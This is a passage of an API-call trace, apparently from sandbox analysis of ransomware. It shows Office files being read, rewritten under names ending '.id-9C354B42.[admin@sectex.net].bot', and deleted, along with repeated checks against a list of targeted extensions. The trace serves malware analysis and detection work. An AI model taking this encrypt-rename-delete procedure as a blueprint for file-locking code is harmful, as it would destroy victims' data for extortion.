	[0145.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0145.039] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.040] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.040] GetLastError () returned 0x0
	[0145.040] ReadFile (in: hFile=0x388, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x7fb, lpOverlapped=0x0) returned 1
	[0145.080] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x800, lpOverlapped=0x0) returned 1
	[0145.081] ReadFile (in: hFile=0x388, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.081] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0145.081] SetEndOfFile (hFile=0x31c) returned 1
	[0145.656] CloseHandle (hObject=0x31c) returned 1
	[0145.656] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.656] SetEndOfFile (hFile=0x388) returned 1
	[0146.022] CloseHandle (hObject=0x388) returned 1
	[0146.022] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.022] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd")) returned 1
	[0146.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.023] lstrlenW (lpString=".doc") returned 4
	[0146.024] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0146.024] lstrlenW (lpString=".docx") returned 5
	[0146.024] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0146.024] lstrlenW (lpString=".pdf") returned 4
	[0146.024] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0146.024] lstrlenW (lpString=".xls") returned 4
	[0146.024] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0146.024] lstrlenW (lpString=".xlsx") returned 5
	[0146.024] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0146.024] lstrlenW (lpString=".ppt") returned 4
	[0146.024] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0146.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.024] lstrlenW (lpString=".zip") returned 4
	[0146.024] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0146.024] lstrlenW (lpString=".rar") returned 4
	[0146.024] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0146.024] lstrlenW (lpString=".bz2") returned 4
	[0146.024] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0146.024] lstrlenW (lpString=".7z") returned 3
	[0146.024] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0146.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.024] lstrlenW (lpString=".dbf") returned 4
	[0146.024] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0146.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.024] lstrlenW (lpString=".1cd") returned 4
	[0146.024] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0146.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.024] lstrlenW (lpString=".jpg") returned 4
	[0146.024] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0146.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.024] lstrlenW (lpString=".doc") returned 4
	[0146.024] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0146.025] lstrlenW (lpString=".docx") returned 5
	[0146.025] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0146.025] lstrlenW (lpString=".pdf") returned 4
	[0146.025] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0146.025] lstrlenW (lpString=".xls") returned 4
	[0146.025] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0146.025] lstrlenW (lpString=".xlsx") returned 5
	[0146.025] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0146.025] lstrlenW (lpString=".ppt") returned 4
	[0146.025] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0146.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.025] lstrlenW (lpString=".zip") returned 4
	[0146.025] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0146.025] lstrlenW (lpString=".rar") returned 4
	[0146.025] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0146.025] lstrlenW (lpString=".bz2") returned 4
	[0146.025] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0146.025] lstrlenW (lpString=".7z") returned 3
	[0146.025] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0146.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.025] lstrlenW (lpString=".dbf") returned 4
	[0146.025] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0146.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.025] lstrlenW (lpString=".1cd") returned 4
	[0146.025] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0146.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57
	[0146.025] lstrlenW (lpString=".jpg") returned 4
	[0146.025] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0146.025] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0146.025] lstrlenW (lpString="HVACDIFF.VRD") returned 12
	[0146.026] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.094] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1919) returned 1
	[0146.094] CloseHandle (hObject=0x3ac) returned 1
	[0146.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd")) returned 0x20
	[0146.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0146.116] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.116] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0146.116] GetLastError () returned 0x0
	[0146.116] ReadFile (in: hFile=0x1b8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x77f, lpOverlapped=0x0) returned 1
	[0146.123] WriteFile (in: hFile=0x3d4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x780, lpOverlapped=0x0) returned 1
	[0146.123] ReadFile (in: hFile=0x1b8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.124] WriteFile (in: hFile=0x3d4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.124] SetEndOfFile (hFile=0x3d4) returned 1
	[0146.124] CloseHandle (hObject=0x3d4) returned 1
	[0146.124] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.124] SetEndOfFile (hFile=0x1b8) returned 1
	[0146.126] CloseHandle (hObject=0x1b8) returned 1
	[0146.126] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.129] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd")) returned 1
	[0146.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.195] lstrlenW (lpString=".doc") returned 4
	[0146.195] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0146.195] lstrlenW (lpString=".docx") returned 5
	[0146.195] lstrcmpiW (lpString1=".docx", lpString2="F.VRD") returned -1
	[0146.195] lstrlenW (lpString=".pdf") returned 4
	[0146.195] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0146.195] lstrlenW (lpString=".xls") returned 4
	[0146.195] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0146.195] lstrlenW (lpString=".xlsx") returned 5
	[0146.195] lstrcmpiW (lpString1=".xlsx", lpString2="F.VRD") returned -1
	[0146.195] lstrlenW (lpString=".ppt") returned 4
	[0146.195] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0146.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.195] lstrlenW (lpString=".zip") returned 4
	[0146.195] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0146.195] lstrlenW (lpString=".rar") returned 4
	[0146.195] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0146.195] lstrlenW (lpString=".bz2") returned 4
	[0146.195] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0146.195] lstrlenW (lpString=".7z") returned 3
	[0146.195] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0146.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.195] lstrlenW (lpString=".dbf") returned 4
	[0146.195] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0146.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.195] lstrlenW (lpString=".1cd") returned 4
	[0146.195] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0146.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.196] lstrlenW (lpString=".jpg") returned 4
	[0146.196] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0146.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.196] lstrlenW (lpString=".doc") returned 4
	[0146.196] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0146.196] lstrlenW (lpString=".docx") returned 5
	[0146.196] lstrcmpiW (lpString1=".docx", lpString2="F.VRD") returned -1
	[0146.196] lstrlenW (lpString=".pdf") returned 4
	[0146.196] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0146.196] lstrlenW (lpString=".xls") returned 4
	[0146.196] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0146.196] lstrlenW (lpString=".xlsx") returned 5
	[0146.196] lstrcmpiW (lpString1=".xlsx", lpString2="F.VRD") returned -1
	[0146.196] lstrlenW (lpString=".ppt") returned 4
	[0146.196] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0146.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.196] lstrlenW (lpString=".zip") returned 4
	[0146.196] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0146.196] lstrlenW (lpString=".rar") returned 4
	[0146.196] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0146.196] lstrlenW (lpString=".bz2") returned 4
	[0146.196] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0146.196] lstrlenW (lpString=".7z") returned 3
	[0146.196] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0146.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.196] lstrlenW (lpString=".dbf") returned 4
	[0146.196] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0146.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.196] lstrlenW (lpString=".1cd") returned 4
	[0146.196] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0146.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60
	[0146.197] lstrlenW (lpString=".jpg") returned 4
	[0146.197] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0146.197] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0146.197] lstrlenW (lpString="INFOPATHEDITOR.HXS") returned 18
	[0146.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0146.198] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=432098) returned 1
	[0146.198] CloseHandle (hObject=0x3c0) returned 1
	[0146.198] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs")) returned 0x20
	[0146.198] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0146.199] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.199] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0146.263] GetLastError () returned 0x0
	[0146.263] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x697e2, lpOverlapped=0x0) returned 1
	[0146.276] WriteFile (in: hFile=0x3c8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x697f0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x697f0, lpOverlapped=0x0) returned 1
	[0146.283] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.283] WriteFile (in: hFile=0x3c8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0146.283] SetEndOfFile (hFile=0x3c8) returned 1
	[0146.648] CloseHandle (hObject=0x3c8) returned 1
	[0146.648] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.648] SetEndOfFile (hFile=0x3c0) returned 1
	[0147.332] CloseHandle (hObject=0x3c0) returned 1
	[0147.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.333] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs")) returned 1
	[0147.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.334] lstrlenW (lpString=".doc") returned 4
	[0147.334] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0147.334] lstrlenW (lpString=".docx") returned 5
	[0147.334] lstrcmpiW (lpString1=".docx", lpString2="R.HXS") returned -1
	[0147.334] lstrlenW (lpString=".pdf") returned 4
	[0147.334] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0147.334] lstrlenW (lpString=".xls") returned 4
	[0147.334] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0147.334] lstrlenW (lpString=".xlsx") returned 5
	[0147.334] lstrcmpiW (lpString1=".xlsx", lpString2="R.HXS") returned -1
	[0147.334] lstrlenW (lpString=".ppt") returned 4
	[0147.334] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0147.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.334] lstrlenW (lpString=".zip") returned 4
	[0147.334] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0147.334] lstrlenW (lpString=".rar") returned 4
	[0147.334] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0147.334] lstrlenW (lpString=".bz2") returned 4
	[0147.334] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0147.334] lstrlenW (lpString=".7z") returned 3
	[0147.334] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0147.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.334] lstrlenW (lpString=".dbf") returned 4
	[0147.335] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0147.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.335] lstrlenW (lpString=".1cd") returned 4
	[0147.335] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0147.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.335] lstrlenW (lpString=".jpg") returned 4
	[0147.335] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0147.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.335] lstrlenW (lpString=".doc") returned 4
	[0147.335] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0147.335] lstrlenW (lpString=".docx") returned 5
	[0147.335] lstrcmpiW (lpString1=".docx", lpString2="R.HXS") returned -1
	[0147.335] lstrlenW (lpString=".pdf") returned 4
	[0147.335] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0147.335] lstrlenW (lpString=".xls") returned 4
	[0147.335] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0147.335] lstrlenW (lpString=".xlsx") returned 5
	[0147.335] lstrcmpiW (lpString1=".xlsx", lpString2="R.HXS") returned -1
	[0147.335] lstrlenW (lpString=".ppt") returned 4
	[0147.335] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0147.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.335] lstrlenW (lpString=".zip") returned 4
	[0147.335] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0147.335] lstrlenW (lpString=".rar") returned 4
	[0147.335] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0147.335] lstrlenW (lpString=".bz2") returned 4
	[0147.335] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0147.335] lstrlenW (lpString=".7z") returned 3
	[0147.335] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0147.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.336] lstrlenW (lpString=".dbf") returned 4
	[0147.336] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0147.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.336] lstrlenW (lpString=".1cd") returned 4
	[0147.336] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0147.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66
	[0147.336] lstrlenW (lpString=".jpg") returned 4
	[0147.336] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0147.336] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0147.336] lstrlenW (lpString="MAPIR.DLL") returned 9
	[0147.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0147.370] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1124720) returned 1
	[0147.370] CloseHandle (hObject=0x3d4) returned 1
	[0147.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll")) returned 0x20
	[0147.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0147.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57
	[0147.370] lstrlenW (lpString=".doc") returned 4
	[0147.370] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.370] lstrlenW (lpString=".docx") returned 5
